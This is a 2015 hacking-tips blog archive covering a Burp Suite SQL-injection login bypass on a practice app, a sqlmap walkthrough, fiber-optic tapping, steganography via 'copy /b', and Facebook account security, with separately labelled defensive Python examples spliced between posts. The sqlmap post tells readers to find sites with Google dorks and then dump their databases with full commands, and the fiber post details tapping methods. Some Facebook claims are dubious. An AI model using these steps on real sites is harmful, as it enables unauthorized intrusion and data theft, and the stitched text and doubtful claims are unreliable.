Thursday, December 10, 2015

BURP SUITE BASICS





WHAT IS BURP SUITE?

Burp Suite is a popular platform in the field of web application penetration testing. It gives you various options for exploring the fundamental process that goes on when a web application is in use.

In this blog I will show how to set up Burp Suite, and I will also do a simple authentication bypass to show you clearly how this platform works.

HOW TO SET UP BURP SUITE:

1) Download Burp Suite from https://portswigger.net/burp/ (it's free).
2) Open Burp Suite.

3) Go to Proxy ----> Options.

4) Then enter the IP and port. By default the IP will be 127.0.0.1 and the port will be 8080.
5) Open your browser. Go to network options.
6) Change the configuration from NO PROXY to MANUAL PROXY and enter the same IP that you entered in the Burp Suite proxy options.

7) Now your Burp Suite is set up.

OK, now that Burp Suite is set up, let me show you a simple authentication bypass using Burp Suite. For this I will take the help of Mutillidae.

--> I opened a simple login page in Mutillidae.

--> Filled in a random username and password. Go to the Intercept option in Burp Suite and turn intercept ON.

--> Now click on LOGIN.
--> Now check Burp Suite and you will find the intercepted data as shown below.

--> Change the username and password to an SQL payload.

--> Click on Forward.

--> And WWWOOOLLLAAA!!!! It's done. Successfully done an authentication bypass.
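Why an edited login request can get past the check, and the server-side fix, as an added example (not code from Mutillidae or from the original post). The table, the function names and the test inputs are constructed for illustration, and SQLite stands in for the application's database.

```python
import sqlite3

def make_db():
    # In-memory stand-in for the application's user table (constructed data).
    # Plaintext password only to keep the example short; real systems store hashes.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.execute("INSERT INTO accounts VALUES ('admin', 'S3cret-not-guessable')")
    return db

def login_concatenated(db, username, password):
    # Vulnerable pattern: request values are pasted into the SQL text, so a
    # quote in the input changes the structure of the query itself.
    sql = ("SELECT username FROM accounts WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def login_parameterized(db, username, password):
    # Hardened pattern: values are bound as data and never parsed as SQL.
    sql = "SELECT username FROM accounts WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def compare(username, password):
    """Return (result of concatenated check, result of parameterized check)."""
    db = make_db()
    return (login_concatenated(db, username, password),
            login_parameterized(db, username, password))

# Constructed test input: a value containing quotes that rewrites the WHERE clause.
TAUTOLOGY = "' OR '1'='1"
```

Both functions agree on ordinary input; they differ only when the submitted value contains SQL syntax, which is why the fix belongs in the query code and not in browser-side validation that a proxy can skip.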




Hope you got a basic knowledge of this platform and what it is capable of.
TILL THE NEXT BLOG SA-YO-NARA!!!!
And don't forget to COMMENT down your suggestions.


Terms & Warning:

Use this post for educational purposes only and for your self knowledge.
Pro Hack Tricks Blog Team, its Author, Admin cannot be held responsible for any legal action or other action taken against you if you use this script illegally. Use at your own risk. But remember no one is untraceable.

Monday, October 5, 2015

SQL INJECTION USING SQLMAP

This post is about using a penetration testing tool called sqlmap. Once we get an SQL-related error on a website, we can exploit that vulnerability using sqlmap. But first we need to find some vulnerable links on the targeted website.



HOW TO FIND AN SQL ERROR IN A TARGETED WEBSITE?


To get the targeted links of a website you need to use Google dorks, for example: site: "Targeted website" inurl:.php?id= (without the double quotes). Once you get links matching this, open them, put a single quote ( ' ) after the link and check for the vulnerability. If the link is vulnerable, an SQL error will pop up like this: (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1). This is just an example. An SQL error includes "SQL" in it (it might also be a MySQL error, which is also part of SQL), so you only have to check whether "SQL" is listed somewhere in the error. If it is, the link is vulnerable.



Now the real game starts: exploiting that vulnerable link.


For this you need sqlmap. I will use it in KALI LINUX (this OS is used by HACKERS). You can also use it on WINDOWS, MAC or UBUNTU; the steps are the same on every OS.

Step 01 :- sqlmap -u "Vulnerable URL" and press enter


Step 02 :- Check whether the Vulnerable URL is injectable or not.


Here the URL is vulnerable, so I will get an injection point.

Step 03 :- If you get any injection points, choose the injection point that you want to use.

Step 04 :- The injection points found by sqlmap are also saved at the location sqlmap specifies.
You can also copy the PAYLOAD directly from sqlmap; here I will copy it directly from sqlmap.


Step 05 :- sqlmap -u "Vulnerable URL" --data "Paste the Payload here" and press enter


Step 06 :- sqlmap -u "Vulnerable URL" --data "Payload" --dbs (to get the available databases)


Step 07 :- Choose the database and fetch the tables.


Step 08 :- sqlmap -u "Vulnerable URL" --data "Payload" --tables -D chosen_database


Step 09 :- Now fetch the columns of the chosen tables.


Step 10 :- sqlmap -u "Vulnerable URL" --data "Payload" --columns -D chosen_database -T chosen_table


You can fetch multiple columns by separating the column names with a comma (,).

Step 11 :- Get the data of all columns of chosen_table by dumping it.


Step 12 :- sqlmap -u "Vulnerable URL" --data "Payload" --dump -D chosen_database -T chosen_table


You now have a dump of the following database.
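What the quote probe and the sqlmap run above look like from the server side, as an added example (not part of the original post): a small access-log triage script. The log lines are constructed, the paths are hypothetical, and it assumes the combined log format and an application that answers a failed query with a 5xx status.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def signals(line):
    """Return (client_ip, set of signal names) for one log line, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    found = set()
    # Weak signal: the User-Agent is client-controlled and trivially changed.
    if "sqlmap" in m["ua"].lower():
        found.add("sqlmap-user-agent")
    # parse_qsl percent-decodes, so %27 and a literal ' are treated alike.
    params = parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True)
    if any("'" in value for _, value in params):
        found.add("quote-in-parameter")
        if m["status"].startswith("5"):
            found.add("quote-caused-server-error")
    return m["ip"], found

def suspicious_clients(lines):
    """Map client IP -> sorted signal names, for clients with any signal."""
    per_ip = defaultdict(set)
    for line in lines:
        parsed = signals(line)
        if parsed and parsed[1]:
            per_ip[parsed[0]] |= parsed[1]
    return {ip: sorted(found) for ip, found in per_ip.items()}

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Oct/2015:10:00:01 +0000] "GET /item.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [05/Oct/2015:10:00:09 +0000] "GET /item.php?id=7%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [05/Oct/2015:10:00:15 +0000] "GET /item.php?id=7 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '203.0.113.5 - - [05/Oct/2015:10:01:00 +0000] "GET /search.php?q=o%27brien HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]
```

A quote on its own also appears in ordinary input such as a surname, so the useful alert is the combination of signals from one client, and the lasting fix is parameterized queries plus not returning database errors to the browser.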













NOTE:

Without prior permission of the developer or admin of the website or web application, it is illegal to test it for any vulnerability assessment.











Friday, October 2, 2015

DATA BREACH IN OPTICAL FIBER NETWORKS

This post is going to break some of the most famous myths about optical fiber networks. Recently copper cables have been replaced by fiber optics because fiber optic cables are far more efficient than copper cables. Data flowing through copper cables was easily tapped using magnetic induction techniques. Fiber optics overcame this problem, as the data inside is in the form of light and doesn't produce any magnetic field around the surface of the wire.


First of all, let's look into the construction of the optical fiber cable.
An optical fiber cable includes the following:-

1) Core - The centermost part (glass).

2) Cladding - The second layer of glass above the core.

3) Buffer jacket - It protects the fiber from external mechanical influences.

4) Kevlar - After the buffer jacket comes a layer of Kevlar, which increases the tensile strength of the cable.

5) Black polyurethane jacket - It is the outermost layer of the fiber optic cable.


There are certain myths surrounding fiber optic networks. They are as follows:-



-->Fiber optic is completely secure.

-->Dark fibers provided by the carriers are secure.

-->Data is protected by volume.

-->Width Data Modulation networks cannot be tapped.

Now I am going to introduce you to some of the tapping techniques that can be used to breach data from an optical fiber network, and which break all the myths mentioned above.


Tapping techniques for fiber optic cable are usually passive, safe and cheap:

-->PASSIVE - they don't raise the suspicion of end users.

-->SAFE - they don't leave a trace of the attacker.

-->CHEAP - the tools that can be used to tap are very cheap.

Given below are the tapping techniques for fiber optic cable :-

A) COUPLER SPLICE-IN :-

In this technique a fiber coupler with 1 input and 2 outputs is used. Below a splice-in coupler is shown.


This is the simplest and most primitive method of tapping into a fiber optic cable. Here, the fiber optic cable is cut and a coupler is spliced in such a way that the signal continues to the intended party whilst being eavesdropped by the attacker.


B) FIBER BENDING COUPLING :-

In this technique a clip-on coupler is used to tap the data.
Below a clip-on coupler is shown.


Data in the form of light inside the optical fiber has to follow the principle of total internal reflection. But when the fiber optic cable is bent beyond a certain angle, total internal reflection no longer holds at the bend, and some amount of light starts to seep through the surface of the cable at the point of bending, which is invisible to the naked eye. The bending coupler captures this light, and the astonishing fact is that the attacker can obtain the full amount of data even by capturing a small amount of light from the optical cable.


C) EVANESCENT COUPLING :-



Although most of the signal lies in the core of the fiber, a fraction of the light is also extended into the cladding. This fraction of light is called the evanescent field. Removing the fiber coating and a part of the cladding without touching the core would enable an attacker to access the evanescent field and eavesdrop on the line. For a skilled technician, the whole process would take approximately one hour to complete.
By capturing only a small percentage of the light, a hacker can obtain 100% of the information.

Now that we have seen all the tapping techniques, let's discuss some security solutions.

SOLUTIONS FROM SECURITY POINT OF VIEW:-

1) Attenuation monitoring:-

Optical signals suffer minor degradation as they travel through the fiber. This is usually caused by scattering and absorption of light along the length of the fiber and is known as attenuation. Devices that check the attenuation of the signal in an optical fiber are available and can be used to check whether the predetermined intensity of the signal has changed. Any alteration in the attenuation could then be detected.

The limitation of this method is that it cannot detect an evanescent coupling tap, nor a coupler that is already placed in the fiber.
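Attenuation monitoring and its second limitation, as an added example (not from the original post): compare each span-loss reading with a baseline and alert on a sustained increase. The power readings, the 0.3 dB threshold and the three-sample persistence are constructed assumptions, not measured values.

```python
from statistics import median

def loss_db(tx_dbm, rx_dbm):
    # Span loss in dB is launch power minus received power (both in dBm).
    return tx_dbm - rx_dbm

def find_loss_events(readings, baseline_n=5, threshold_db=0.3, persist=3):
    """readings: list of (time, tx_dbm, rx_dbm), oldest first.
    Returns (baseline_loss_db, [(start_time, peak_excess_db), ...])."""
    losses = [(t, loss_db(tx, rx)) for t, tx, rx in readings]
    # The first baseline_n samples define "normal"; anything already on the
    # fiber during that window becomes part of normal.
    baseline = median(loss for _, loss in losses[:baseline_n])
    events, run = [], []
    for t, loss in losses[baseline_n:]:
        if loss - baseline > threshold_db:
            run.append((t, loss))
            # Report once, when the excess has persisted long enough that it
            # is not a one-sample measurement glitch.
            if len(run) == persist:
                peak = max(x for _, x in run) - baseline
                events.append((run[0][0], round(peak, 2)))
        else:
            run = []
    return baseline, events

def as_readings(rx_series, tx_dbm=0.0):
    # Turn a list of received-power samples into (time, tx, rx) tuples.
    return [(i, tx_dbm, rx) for i, rx in enumerate(rx_series)]

# Constructed series: extra loss appears from sample 9 on; sample 7 is a glitch.
RX_TAP_ADDED = [-6.00, -6.02, -5.98, -6.01, -6.00, -6.01, -6.03,
                -6.90, -6.00, -6.60, -6.62, -6.58, -6.61]
# Constructed series: the extra loss was there before monitoring started.
RX_TAP_PRESENT = [-6.60, -6.62, -6.58, -6.61, -6.60, -6.61, -6.59, -6.62, -6.60]
```

The second series produces no event because the coupler's loss is already inside the baseline, which is the "coupler that is already placed" limitation described above.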

2)  Providing encryption:-

We can encrypt the data that is being transferred through the optical cable. Employing the right encryption technology will help corporations ensure that performance is not sacrificed for security. Encrypting data at layer 2 (the data link layer) can ensure high throughput and low latency (less than 10 microseconds). In contrast to layer 3 encryption (e.g. IPsec), there is no encryption tax at layer 2 on the size of the data packets. Encryption can therefore be performed at wire speed (the maximum data transmission rate) for even the most demanding 10 Gbps links.




CONCLUSION :-

Organizations spend lots of money on setting up various technologies such as firewalls, IDS and IPS, which is good practice, but they fail to maintain the integrity of the information once it goes out of the organization. As malicious and criminal attacks spread, companies need to exercise due caution to protect their data.
Encryption is the only method to ensure real data security. This should be implemented as part of a coherent risk management and data protection strategy. Whether companies plan to connect data centers, campus networks or foreign branches, they need encryption – without encryption there is no compliance, no confidentiality and ultimately no security.

But remember, encryption is also not an ultimate solution, but with it we can control data breaches to a great extent.


Friday, March 6, 2015

Steganography

Definition:- Steganography (STEHG-uh-NAH-gruhf-ee, from Greek steganos, meaning "covered," and graphie, meaning "writing") is the hiding of a secret message within an ordinary message and the extraction of it at its destination.


Steganography is the art or practice of concealing a file, message, image, or video within another file, message, image, or video. The advantage of steganography over cryptography alone is that the intended secret message does not attract attention to itself as an object of scrutiny. Plainly visible encrypted messages, no matter how unbreakable, will arouse interest, and may in themselves be incriminating in countries where encryption is illegal.

The first recorded uses of steganography can be traced back to 440 BC, when Herodotus mentions two examples in his Histories. Demaratus sent a warning about a forthcoming attack to Greece by writing it directly on the wooden backing of a wax tablet before applying its beeswax surface. Wax tablets were in common use then as reusable writing surfaces, sometimes used for shorthand.

Modern steganography entered the world in 1985 with the advent of personal computers being applied to classical steganography problems. Development following that was very slow, but has since taken off, going by the large number of steganography software available.


Making Steganography with CMD

Requirements

  • Pic
  • Secret message that can be embedded into it
  • CMD


  1. Select any one pic from your system.
  2. Write any secret message in Notepad or Word (save both files in "d:").
  3. Open cmd.
Commands


  • d:
  • dir


  • copy /b pic.jpg+secret.txt "new pic.jpg"


  • Here you can see that the pic and the text are combined. (/b makes copy treat the files as binary, and the quotes are needed because the output file name contains a space.)
How to see the message written behind the pic


Open the pic (here it is "new pic"), so I opened it. Now you will see the actual pic. Now "right click" it and open it with "Notepad". The message which you have written is at the end, so press "End" on your keyboard and you will see that the message which you have written is there.
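How a defender finds data appended to a picture this way, as an added example (not part of the original post): walk the JPEG markers to the real End Of Image marker and return whatever follows it. The sample bytes are a constructed, structurally minimal JPEG, not a viewable picture.

```python
STANDALONE = {0x01} | set(range(0xD0, 0xD8))   # TEM and RST0-RST7 carry no length

def jpeg_trailing_data(data: bytes) -> bytes:
    """Return the bytes that follow the JPEG EOI marker (b'' if none)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    i = 2
    while i + 1 < len(data):
        if data[i] != 0xFF:
            raise ValueError(f"corrupt JPEG: no marker at offset {i}")
        marker = data[i + 1]
        if marker == 0xFF:            # fill byte before a marker
            i += 1
        elif marker == 0xD9:          # EOI: the image ends here
            return data[i + 2:]
        elif marker in STANDALONE:
            i += 2
        else:
            if i + 4 > len(data):
                break
            # Skip the whole segment; an FF D9 inside it (e.g. an embedded
            # thumbnail) is payload, not the end of the image.
            i += 2 + int.from_bytes(data[i + 2:i + 4], "big")
            if marker == 0xDA:        # SOS: skip the entropy-coded scan data
                while i + 1 < len(data) and not (
                        data[i] == 0xFF and data[i + 1] != 0x00
                        and data[i + 1] not in STANDALONE):
                    i += 1
    raise ValueError("truncated JPEG: no EOI marker")

def segment(marker, payload):
    # Build one length-prefixed JPEG segment for the constructed sample.
    return bytes([0xFF, marker]) + (len(payload) + 2).to_bytes(2, "big") + payload

# Constructed sample: SOI, APP1 with an embedded FF D9, SOS, scan data, EOI.
SAMPLE_JPEG = (b"\xff\xd8" + segment(0xE1, b"thumb\xff\xd9data")
               + segment(0xDA, bytes(6)) + b"\x12\xff\x00\x34\xff\xd0\x56"
               + b"\xff\xd9")

def report(data):
    extra = jpeg_trailing_data(data)
    return {"trailing_bytes": len(extra), "preview": extra[:32]}
```

Some devices and editors also append data after EOI, so a non-zero count is a reason to inspect the file and not proof of a hidden message.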





This was the trick of creating Steganography. Be safe and send encrypted message.

Reference:-  http://en.wikipedia.org/wiki/Steganography



Monday, March 2, 2015

Facebook hacking and Security Tips(LOGIN APPROVALS)

Facebook Hacking 



Nowadays Facebook is the key to making new friends, chatting, posting your pictures and sharing your private life on the internet. We are excited to know with whom our friends, family members and GF/BF are chatting, what pics they are posting, etc. So, to get someone's information on Facebook, we are hacking into their accounts and getting their information. There are many ways to crack someone's Facebook account. Hackers can only hack your account with your help; without your help nothing is possible.

WAYS OF HACKING FACEBOOK

  1. Phishing
  2. Keylogging
  3. Social Engineering
  4. Sniffing
  5. Brute-force attack
These are the 5 ways by which your account can be hacked. So I want to tell you that without your help no one can crack your Facebook account. Facebook doesn't have any loopholes, so a hacker cannot enter its servers and get your ID and password. Securing yourself is your own responsibility. Facebook will provide you the security, but it's up to you to activate it or not.

Facebook Security




Today I will show you a security feature called LOGIN APPROVALS. This is a security feature made by Facebook, like 2-step verification. It basically means that entering the ID and password at login is not sufficient: you will get an OTP (One Time Password). When the server validates that OTP, it will allow access to your account. The same thing is there in many email services, net banking, etc.


In ASIAN countries this security feature is not available. But if you are living outside Asian countries, this feature is available. I am currently living in INDIA, so this feature is not available. And the good thing is I have had LOGIN APPROVALS for more than the last 6 months.

How to get LOGIN APPROVALS in Asian countries: here is the simple way to get LOGIN APPROVALS (2-step verification) activated in your account.


Download TOR Browser: click on this link TOR Browser

Install it. After installing, click on the exe file.

Now click on "Start Tor Browser".


The screen will appear like this after starting.


  • Now type the URL facebook.com



  • Enter your login ID and password.
  • Then go to "Option" (it is on the top right side) and select "Settings" as shown in the image.

  • Once you are in, click on "Security", the 2nd option from the top on the left side.


  • Now click on "App password", select Edit, then "Generate app passwords" and follow the steps.



You are done with LOGIN APPROVALS; now you will get an OTP to enter into your Facebook ID.



NOTE:- This is an illegal process of getting LOGIN APPROVALS. In Asian countries this feature has not come into play. So keep this for educational purposes only. Don't try this.


